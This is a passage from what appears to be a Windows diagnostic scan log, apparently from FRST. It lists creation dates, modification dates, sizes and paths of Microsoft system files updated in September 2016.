00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll 2016-09-29 15:15 - 2016-09-15 09:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2016-09-29 15:15 - 2016-09-15 09:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll 2016-09-29 15:15 - 2016-09-15 09:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2016-09-29 15:15 - 2016-09-15 09:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2016-09-29 15:15 - 2016-09-15 09:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll 2016-09-29 15:15 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll 2016-09-29 15:14 - 2016-09-15 11:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-09-29 15:14 - 2016-09-15 10:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll 2016-09-29 15:14 - 2016-09-15 10:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll 2016-09-29 15:14 - 2016-09-15 10:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll 2016-09-29 15:14 - 2016-09-15 10:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2016-09-29 15:14 - 2016-09-15 10:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe 2016-09-29 15:14 - 2016-09-15 10:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll 2016-09-29 15:14 - 2016-09-15 10:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll 2016-09-29 15:14 - 2016-09-15 10:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll 2016-09-29 15:14 - 2016-09-15 10:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe 2016-09-29 15:14 - 2016-09-15 10:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-09-29 15:14 - 2016-09-15 10:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll 2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll 2016-09-29 15:14 - 2016-09-15 10:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2016-09-29 15:14 - 2016-09-15 10:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-09-29 15:14 - 2016-09-15 10:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-09-29 15:14 - 2016-09-15 10:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2016-09-29 15:14 - 2016-09-15 10:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-09-29 15:14 - 2016-09-15 10:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2016-09-29 15:14 - 2016-09-15 10:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll 2016-09-29 15:14 - 2016-09-15 10:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys 2016-09-29 15:14 - 2016-09-15 10:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2016-09-29 15:14 - 2016-09-15 10:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2016-09-29 15:14 - 2016-09-15 10:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-09-29 15:14 - 2016-09-15 10:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll 2016-09-29 15:14 - 2016-09-15 10:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2016-09-29 15:14 - 2016-09-15 10:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll 2016-09-29 15:14 - 2016-09-15 10:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll 2016-09-29 15:14 - 2016-09-15 10:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2016-09-29 15:14 - 2016-09-15 10:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-09-29 15:14 - 2016-09-15 10:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2016-09-29 15:14 - 2016-09-15 10:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll 2016-09-29 15:14 - 2016-09-15 10:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2016-09-29 15:14 - 2016-09-15 10:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll 2016-09-29 15:14 - 2016-09-15 10:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll 2016-09-29 15:14 - 2016-09-15 10:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll 2016-09-29 15:14 - 2016-09-15 09:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll 2016-09-29 15:14 - 2016-09-15 09:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2016-09-29 15:14 - 2016-09-15 09:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll 2016-09-29 15:14 - 2016-09-15 09:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll 2016-09-29 15:14 - 2016-09-15 09:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2016-09-29 15:14 - 2016-09-15 09:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2016-09-29 15:14 - 2016-09-15 09:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll 2016-09-29 15:14 - 2016-09-15 09:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll 2016-09-29 15:14 - 2016-09-15 09:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2016-09-29 15:14 - 2016-09-15 09:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll 2016-09-29 15:14 - 2016-09-15 09:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll 2016-09-29 15:14 - 2016-09-15 09:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll 2016-09-29 15:14 - 2016-09-15 09:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll 2016-09-29 15:14 - 2016-09-15 09:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll 2016-09-29 15:14 - 2016-09-15 09:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll 2016-09-29 15:14 - 2016-09-15 09:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll 2016-09-29 15:14 - 2016-09-15 09:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll 2016-09-29 15:14 - 2016-09-15 09:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll 2016-09-29 15:14 - 2016-09-15 09:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-09-29 15:14 - 2016-09-15 09:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll 2016-09-29 15:14 - 2016-09-15 09:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe 2016-09-29 15:14 - 2016-09-15 09:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll 2016-09-29 15:14 - 2016-09-15 09:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll 2016-09-29 15:14 - 2016-09-15 09:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll 2016-09-29 15:14 - 2016-09-15 09:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2016-09-29 15:14 - 2016-09-15 09:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll 2016-09-29 15:14 - 2016-09-15 09:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll 2016-09-29 15:14 - 2016-09-15 09:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll 2016-09-29 15:14 - 2016-09-15 09:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll 2016-09-29 15:14 - 2016-09-15 09:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe 2016-09-29 15:14 - 2016-09-15 09:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys 2016-09-29 15:14 - 2016-09-15 09:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll 2016-09-29 15:14 - 2016-09-15 09:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-09-29 15:14 - 2016-09-15 09:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2016-09-29 15:14 - 2016-09-15 09:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2016-09-29 15:14 - 2016-09-15 09:41 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthA2DP.sys 2016-09-29 15:14 - 2016-09-15 09:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll 2016-09-29 15:14 - 2016-09-15 09:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2016-09-29 15:14 - 2016-09-15 09:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2016-09-29 15:14 - 2016-09-15 09:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe 2016-09-29 15:14 - 2016-09-15 09:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe 2016-09-29 15:14 - 2016-09-15 09:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll 2016-09-29 15:14 - 2016-09-15 09:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll 2016-09-29 15:14 - 2016-09-15 09:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll 2016-09-29 15:14 - 2016-09-15 09:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2016-09-29 15:14 - 2016-09-15 09:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll 2016-09-29 15:14 - 2016-09-15 09:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll 2016-09-29 15:14 - 2016-09-15 09:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll 2016-09-29 15:14 - 2016-09-15 09:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll 2016-09-29 15:14 - 2016-09-15 09:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll 2016-09-29 15:14 - 2016-09-15 09:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-09-29 15:14 - 2016-09-15 09:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll 2016-09-29 15:14 - 2016-09-15 09:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe 2016-09-29 15:14 - 2016-09-15 09:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe 2016-09-29 15:14 - 2016-09-15 09:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll 2016-09-29 15:14 - 2016-09-15 09:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll 2016-09-29 15:14 - 2016-09-15 09:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2016-09-29 15:14 - 2016-09-15 09:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe 2016-09-29 15:14 - 2016-09-15 09:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll 2016-09-29 15:14 - 2016-09-15 09:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll 2016-09-29 15:14 - 2016-09-15 09:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll 2016-09-29 15:14 - 2016-09-15 09:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe 2016-09-29 15:14 - 2016-09-15 09:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll 2016-09-29 15:14 - 2016-09-15 09:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2016-09-29 15:14 - 2016-09-15 09:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2016-09-29 15:14 - 2016-09-15 09:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll 2016-09-29 15:14 - 2016-09-15 09:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2016-09-29 15:14 - 2016-09-15 09:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll 2016-09-29 15:14 - 2016-09-15 09:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2016-09-29 15:14 - 2016-09-15 09:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-09-29 15:14 - 2016-09-15 09:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll 2016-09-29 15:14 - 2016-09-15 09:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll 2016-09-29 15:14 - 2016-09-15 09:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll 2016-09-29 15:14 - 2016-09-15 09:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll 2016-09-29 15:14 - 2016-09-15 09:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2016-09-29 15:14 - 2016-09-15 09:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe 2016-09-29 15:14 - 2016-09-15 09:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe 2016-09-29 15:14 - 2016-09-15 09:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2016-09-29 15:14 - 2016-09-15 09:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2016-09-29 15:14 - 2016-09-15 09:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2016-09-29 15:14 - 2016-09-15 09:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll 2016-09-29 15:13 - 2016-09-15 10:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll 2016-09-29 15:13 - 2016-09-15 10:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-09-29 15:13 - 2016-09-15 10:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2016-09-29 15:13 - 2016-09-15 10:30 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll 2016-09-29 15:13 - 2016-09-15 10:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe 2016-09-29 15:13 - 2016-09-15 10:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys 2016-09-29 15:13 - 2016-09-15 10:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys 2016-09-29 15:13 - 2016-09-15 10:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll 2016-09-29 15:13 - 2016-09-15 10:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll 2016-09-29 15:13 - 2016-09-15 10:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll 2016-09-29 15:13 - 2016-09-15 10:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2016-09-29 15:13 - 2016-09-15 10:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2016-09-29 15:13 - 2016-09-15 10:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2016-09-29 15:13 - 2016-09-15 10:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll 2016-09-29 15:13 - 2016-09-15 10:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll 2016-09-29 15:13 - 2016-09-15 10:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2016-09-29 15:13 - 2016-09-15 10:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2016-09-29 15:13 - 2016-09-15 10:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2016-09-29 15:13 - 2016-09-15 10:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2016-09-29 15:13 - 2016-09-15 10:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll 2016-09-29 15:13 - 2016-09-15 10:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2016-09-29 15:13 - 2016-09-15 10:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2016-09-29 15:13 - 2016-09-15 10:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll 2016-09-29 15:13 - 2016-09-15 10:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys 2016-09-29 15:13 - 2016-09-15 10:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll 2016-09-29 15:13 - 2016-09-15 10:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2016-09-29 15:13 - 2016-09-15 10:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys 2016-09-29 15:13 - 2016-09-15 10:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2016-09-29 15:13 - 2016-09-15 10:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2016-09-29 15:13 - 2016-09-15 10:12 - 08158672 _____ 